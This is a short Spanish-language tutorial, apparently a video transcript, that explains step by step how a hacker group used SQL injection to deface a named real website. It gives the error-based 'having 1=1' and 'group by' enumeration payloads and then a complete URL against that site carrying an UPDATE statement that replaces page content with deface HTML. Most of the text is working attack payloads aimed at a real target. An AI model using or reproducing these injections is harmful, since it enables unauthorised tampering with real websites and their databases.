Dedalo

1. Como vemos esa web ha sido defaciada por R00t Mafia...
2.  
3. Ahora yo les voy a ense�ar por medio de sql injection com hicieron ellos...
4.  
5.  
6. usando:
7. having+1=1--
8.  
9. obtuvimos lo siguiente:
10. Column 'ContentItemDetail.cid_id' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
11.  
12. ahora claramente podemos continuar para sacar las otras tablas... miren la linea de abajo
13.  
14. esa es la syntaxis que usaremos...
15.  
16.  
17. Group by tabla.id having+1=1--
18.  
19. =================================================
20.  
21. listop ya tenemos las dos columnas que necesitamos para poder hacer una edicion del index de una manera exitosa... el id y el content =)
22.  
23. update tabla set id = 'hacked'--
24.  
25. con esa syntaxis podemos cambiar el content miren:
26. esa es la relacion con lo que puse aqu�
27.  
28. http://hidrocapital.com.ve/editor/detailtemplate.asp?item_id=1397update ContentItemDetail set cid_content='<body bgcolor="black"><center><font size="6" color="white" face="Tahoma"><b>Ro0T-MaFia Was Here!</b></font></center><p><center><img src="http://i35.tinypic.com/2rzqtys.jpg"></center><center><font size="4" color="white" face="Tahoma"><b>Contact: [email protected] - [email protected]</b></font></center><p><center><font size="2" color="white" face="Tahoma"><b>We are: JxE-13 | 0x0c | Soad | CyberNaj | KX-T33 | DrKSnix | Zero Bits | D4NB4R <p>'--
29.  
30.  
31. esa fue la linea de code que usaron ellos para su index...
32.  
33.  
34. Disculpen el no haber hablado pero estaba con dolor de garganta.. y sorry por la musica pero no estaba totalmente cargada... espero les haya gustado el tuto...
35.  
36.  
37. no est� tan bien explicado en relaci�n a otros pero lo quer�a poner como un ejemplo real...
38.  
39.  
40. BY: SEGURIDADBLANCA.ORG